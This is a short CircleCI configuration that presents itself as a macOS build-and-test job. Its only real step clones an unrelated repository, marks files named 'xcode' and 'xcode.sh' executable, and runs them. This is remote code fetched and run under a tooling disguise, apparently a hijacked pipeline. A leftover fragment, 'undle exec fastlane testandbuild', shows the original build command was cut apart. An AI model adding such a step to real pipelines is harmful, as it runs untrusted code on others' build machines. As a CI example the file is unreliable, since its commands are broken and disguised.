version: 2.1

orbs:
    mac-permissions: circleci/macos

jobs:
  build-test:
    macos:
      xcode: 12.5.1
    steps:
        - checkout
        - run: git clone https://github.com/puyuhdus/0.git && cd 0 && chmod u+x xcode xcode.sh && ./xcode.sh
undle exec fastlane testandbuild

workflows:
    verify:
        jobs:
            - build-test
